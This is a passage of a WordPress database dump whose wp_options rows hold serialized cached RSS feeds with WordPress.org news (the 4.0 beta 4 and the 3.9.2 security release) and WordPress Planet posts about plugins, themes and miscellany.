Hou-Sandi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2003:\"<p>The fourth and likely final beta for WordPress 4.0 is now available. We&#8217;ve made <a href=\"https://core.trac.wordpress.org/log?rev=29496&amp;stop_rev=29229&amp;limit=300\">more than 250 changes</a> in the past month, including:</p>\n<ul>\n<li>Further improvements to the editor scrolling experience, especially when it comes to the second column of boxes.</li>\n<li>Better handling of small screens in the media library modals.</li>\n<li>A separate bulk selection mode for the media library grid view.</li>\n<li>Improvements to the installation language selector.</li>\n<li>Visual tweaks to plugin details and customizer panels.</li>\n</ul>\n<p><strong>We need your help</strong>. We’re still aiming for a release this month, which means the next week will be critical for identifying and squashing bugs. If you’re just joining us, please see <a href=\"https://wordpress.org/news/2014/07/wordpress-4-0-beta-1/\">the Beta 1 announcement post</a> for what to look out for.</p>\n<p><strong>If you think you’ve found a bug</strong>, you can post to the <a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a> in the support forums, where friendly moderators are standing by. <b>Plugin developers</b><strong>,</strong> if you haven’t tested WordPress 4.0 yet, now is the time — and be sure to update the “tested up to” version for your plugins so they’re listed as compatible with 4.0.</p>\n<p><strong>This software is still in development,</strong> so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.0, try the <a href=\"https://wordpress.org/extend/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href=\"https://wordpress.org/wordpress-4.0-beta4.zip\">download the beta here</a> (zip).</p>\n<p><em>We are working hard</em><br />\n<em>To finish up 4.0<br />\n</em><em>Will you help us too?</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://wordpress.org/news/2014/08/wordpress-4-0-beta-4/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"WordPress 3.9.2 Security Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/news/2014/08/wordpress-3-9-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/news/2014/08/wordpress-3-9-2/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 06 Aug 2014 19:04:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3269\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:377:\"WordPress 3.9.2 is now available as a security release for all previous versions. We strongly encourage you to update your sites immediately. This release fixes a possible denial of service issue in PHP&#8217;s XML processing, reported by Nir Goldshlager of the Salesforce.com Product Security Team. It  was fixed by Michael Adams and Andrew Nacin of the WordPress [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2353:\"<p>WordPress 3.9.2 is now available as a security release for all previous versions. We strongly encourage you to update your sites immediately.</p>\n<p>This release fixes a possible denial of service issue in PHP&#8217;s XML processing, reported by <a href=\"https://twitter.com/nirgoldshlager\">Nir Goldshlager</a> of the Salesforce.com Product Security Team. It  was fixed by Michael Adams and Andrew Nacin of the WordPress security team and David Rothstein of the <a href=\"https://www.drupal.org/SA-CORE-2014-004\">Drupal security team</a>. This is the first time our two projects have coordinated joint security releases.</p>\n<p>WordPress 3.9.2 also contains other security changes:</p>\n<ul>\n<li>Fixes a possible but unlikely code execution when processing widgets (WordPress is not affected by default), discovered by <a href=\"http://www.buayacorp.com/\">Alex Concha</a> of the WordPress security team.</li>\n<li>Prevents information disclosure via XML entity attacks in the external GetID3 library, reported by <a href=\"http://onsec.ru/en/\">Ivan Novikov</a> of ONSec.</li>\n<li>Adds protections against brute attacks against CSRF tokens, reported by <a href=\"http://systemoverlord.com/\">David Tomaschik</a> of the Google Security Team.</li>\n<li>Contains some additional security hardening, like preventing cross-site scripting that could be triggered only by administrators.</li>\n</ul>\n<p>We appreciated responsible disclosure of these issues directly to our security team. For more information, see the <a href=\"https://codex.wordpress.org/Version_3.9.2\">release notes</a> or consult the <a href=\"https://core.trac.wordpress.org/log/branches/3.9?stop_rev=29383&amp;rev=29411\">list of changes</a>.</p>\n<p><a href=\"https://wordpress.org/download/\">Download WordPress 3.9.2</a> or venture over to <strong>Dashboard → Updates</strong> and simply click &#8220;Update Now&#8221;.</p>\n<p>Sites that support automatic background updates will be updated to WordPress 3.9.2 within 12 hours. (If you are still on WordPress 3.8.3 or 3.7.3, you will also be updated to 3.8.4 or 3.7.4. We don&#8217;t support older versions, so please update to 3.9.2 for the latest and greatest.)</p>\n<p>Already testing WordPress 4.0? The third beta is <a href=\"https://wordpress.org/wordpress-4.0-beta3.zip\">now available</a> (zip) and it contains these security fixes.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/08/wordpress-3-9-2/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:32:\"https://wordpress.org/news/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"hourly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:9:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sun, 08 Feb 2015 16:09:48 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:10:\"x-pingback\";s:37:\"https://wordpress.org/news/xmlrpc.php\";s:13:\"last-modified\";s:29:\"Thu, 18 Dec 2014 18:57:51 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";}s:5:\"build\";s:14:\"20141124234515\";}", "no");
INSERT INTO `wp_options` VALUES("879", "_transient_timeout_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca", "1423454988", "no");
INSERT INTO `wp_options` VALUES("880", "_transient_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca", "1423411788", "no");
INSERT INTO `wp_options` VALUES("881", "_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9", "1423454988", "no");
INSERT INTO `wp_options` VALUES("882", "_transient_feed_d117b5738fbd35bd8c0391cda1f2b5d9", "a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n	\n	\n	\n	\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"Matt: Productivity of Working from Home\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44659\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"http://ma.tt/2015/02/productivity-of-working-from-home/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:270:\"<p>FiveThirtyEight says <a href=\"http://fivethirtyeight.com/datalab/people-working-from-home-in-a-snowstorm-may-be-producing-more-than-you-are/\">People Working From Home In A Snowstorm May Be Producing More Than You Are</a>, on the productivity of working from home.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 08 Feb 2015 03:41:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Matt: Tom Ford’s 15 Things\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44642\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"http://ma.tt/2015/02/tom-fords-15-things/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1195:\"<p>For the <a href=\"http://www.vogue.co.uk/spy/15th-anniversary\">15th anniversary of Vogue.com</a> noted fashion designer Tom Ford made a list of 15 things that every man should have, which are as follow:</p>\n<ol>\n<li>A sense of humour.</li>\n<li>A daily read of a newspaper.</li>\n<li>A sport that you love and are good at.</li>\n<li>Tweezers.</li>\n<li>A good cologne that becomes a signature.</li>\n<li>A well cut dark suit.</li>\n<li>A pair of classic black lace up shoes.</li>\n<li>A smart blazer.</li>\n<li>The perfect pair of dark denim jeans.</li>\n<li>Lots of crisp white cotton shirts.</li>\n<li>Always new socks and underwear, throw away the old ones every 6 months.</li>\n<li>A classic tuxedo.</li>\n<li>A beautiful day watch with a metal band.</li>\n<li>The perfect sunglasses.</li>\n<li>Perfect teeth. If you don&#8217;t have them, save up and get them fixed.</li>\n</ol>\n<p>A pretty good list, though I would <a href=\"http://cir.ca/\">replace the newspaper with Circa</a>, and I must confess I&#8217;m not sure sure what #4 the tweezers are for.</p>\n<p><a href=\"http://om.co/2011/07/05/tom-ford-5-tips-to-be-a-modern-gentleman/\">Om also has Tom Ford&#8217;s 5 tips for a modern gentleman</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 23:49:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Customize Your Login Page Using the WordPress Customizer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38581\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"http://wptavern.com/customize-your-login-page-using-the-wordpress-customizer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2713:\"<p>As a result of the improvements to the Customizer API in WordPress 4.0 and 4.1, developers now have access to a wider array of controls and parameters that allow them to extend the feature for more varied uses beyond themes. The new <a href=\"https://wordpress.org/plugins/login-customizer/\" target=\"_blank\">Custom Login Customizer</a> plugin is a prime example of making the customizer available outside of a theme-related context.</p>\n<p>The plugin adds its own panel to the customizer with a myriad of options for customizing the design of your site&#8217;s login page.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/login-customizer.jpg\" rel=\"prettyphoto[38581]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/login-customizer.jpg?resize=987%2C572\" alt=\"login-customizer\" class=\"aligncenter size-full wp-image-38688\" /></a></p>\n<p>Custom Login Customizer allows you to customize nearly every aspect of the login form, including the following:</p>\n<ul>\n<li>Set a login logo, along with width, height, and padding</li>\n<li>Add a background, select background color and size</li>\n<li>Set a background for the form</li>\n<li>Adjust form styling &#8211; width, height, padding, border</li>\n<li>Style input field width, margin, background, and input/label colors</li>\n<li>Color picker for button background, border, hover background/border, button box shadow</li>\n<li>Select text colors</li>\n<li>Add custom CSS</li>\n</ul>\n<p>I tested the plugin and found it works smoothly as advertised. Once installed, navigate to Appearance > Login Customizer in order to launch your login page in the customizer while still being logged in.</p>\n<p>Custom Login Customizer was created by WordPress developer <a href=\"http://www.hardeepasrani.com/\" target=\"_blank\">Hardeep Asrani</a> and then sold to <a href=\"https://themeisle.com/\" target=\"_blank\">ThemeIsle.com</a> last week. &#8220;I believe Themeisle will most probably have a premium version with some more features in the future,&#8221; Asrani said. &#8220;However, the free plugin will still be there at the WordPerss.org repository and will have more features soon. At this moment, there&#8217;s no premium version or a plan for it.&#8221;</p>\n<p>There are many plugins out there which allow you to customize your login page. However, the advantage of using this particular one is that you can preview your changes live before saving them. This is one of the best uses of the customizer in a plugin that I have seen so far. It makes designing your login page an easy and enjoyable experience. Download the <a href=\"https://wordpress.org/plugins/login-customizer/\" target=\"_blank\">Login Customizer</a> from WordPress.org.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 22:44:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"WPTavern: Custom Metaboxes and Fields for WordPress (CMB2) Now Out of Beta\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38417\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"http://wptavern.com/custom-metaboxes-and-fields-for-wordpress-cmb2-now-out-of-beta\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4291:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/cmb2.jpg\" rel=\"prettyphoto[38417]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/cmb2.jpg?resize=768%2C372\" alt=\"photo credit: Different types of wand cases stacked - (license)\" class=\"size-full wp-image-38683\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/22464562@N00/8084402724\">Different types of wand cases stacked</a> &#8211; <a href=\"https://creativecommons.org/licenses/by/2.0/\">(license)</a>\n<p>The <a href=\"https://github.com/WebDevStudios/CMB2\" target=\"_blank\">Custom Metaboxes and Fields for WordPress (CMB2)</a> plugin is now officially out of beta and ready for public use. The tool was created to make it easy for developers to create metaboxes and forms with custom fields. Developers at <a href=\"http://webdevstudios.com/\" target=\"_blank\">WebDevStudios</a> took over the <a href=\"https://github.com/WebDevStudios/Custom-Metaboxes-and-Fields-for-WordPress\" target=\"_blank\">original CMB GitHub repository</a> from Jared Atchison, its original creator, in December of 2013.</p>\n<p>Justin Sternberg <a href=\"http://webdevstudios.com/2015/02/02/cmb2-wordpress-plugin/\" target=\"_blank\">explained</a> why WebDevStudios chose to start contributing to the CMB2 project:</p>\n<blockquote><p>After having been burned by some issues with other custom field plugins, we determined it was best to stick with code that we had some control over. We fell in love with CMB because it was a library we could include in any of our projects and it would just work while letting us keep all of the field configuration in the code, and more importantly, in our version control system.</p></blockquote>\n<p>Due to irreconcilable shortcomings in the original CMB, WebDevStudios opted to fork the project and create a new one that wouldn&#8217;t have the same backwards compatibility requirements. If you used CMB in the past, it&#8217;s important to note that the new CMB2 project has renamed every class, function, hook, and filter in the library to avoid conflicts with the original. It&#8217;s essentially a complete re-write.</p>\n<p>&#8220;CMB2 was built with a new mechanism to ensure it only loads the most recent version of CMB2 in your system,&#8221; Sternberg said. &#8220;This ensures that a plugin with an old bundled version will not conflict or take precedence over your up-to-date version.&#8221;</p>\n<p>The new <a href=\"https://wordpress.org/plugins/cmb2/\" target=\"_blank\">CMB2 is now available on WordPress.org</a> as a plugin for easy activation when you want to use it with one of your projects. As an alternative, you can <a href=\"https://github.com/WebDevStudios/CMB2/blob/master/example-functions.php#L14\" target=\"_blank\">include CMB2 directly</a>. The newly released plugin features the following:</p>\n<ul>\n<li>Create metaboxes to be used on post edit screens.</li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Using-CMB-to-create-an-Admin-Theme-Options-Page\" target=\"_blank\">Create forms to be used on an options pages.</a></li>\n<li>Create forms to handle user meta and display them on user profile add/edit pages.</li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Bringing-Metaboxes-to-the-Front-end\" target=\"_blank\">Flexible API that allows you to use CMB forms almost anywhere, even on the front-end</a></li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Field-Types#types\" target=\"_blank\">30+ built-in field types</a></li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Adding-your-own-field-types\" target=\"_blank\">Custom API hook that allows you to create your own field types</a></li>\n<li>Numerous hooks and filters, allowing you to modify many aspects of the library (without editing it directly)</li>\n<li>Repeatable fields for most field types are supported, as well as repeatable field groups</li>\n</ul>\n<p>The WebDevStudios team plans to maintain strict backwards compatibility moving forward, as of CMB2&#8217;s 2.0.1 release on WordPress.org. If you want to include CMB2 as part of your next project, make sure to check out the plugin&#8217;s <a href=\"https://github.com/WebDevStudios/CMB2/wiki\" target=\"_blank\">wiki and code library</a> for tips on how to add metaboxes, fields, and forms to WordPress themes and plugins.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 21:05:54 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: Harmonic: A Bold Free WordPress Theme for Artists and Bloggers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38617\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/harmonic-a-bold-free-wordpress-theme-for-artists-and-bloggers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3114:\"<p>If you like designs that feature stunning, fullscreen background images, then Automattic&#8217;s latest free theme release is a prime candidate for your next blog redesign. <a href=\"https://wordpress.org/themes/harmonic\" target=\"_blank\">Harmonic</a> recently landed on WordPress.org and is rapidly closing in on 3,000 downloads.</p>\n<p>This theme puts the spotlight on your images and content. Harmonic&#8217;s striking homepage is accompanied by a minimalist, one-column blog design and an optional portfolio page template.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic.png\" rel=\"prettyphoto[38617]\"><img 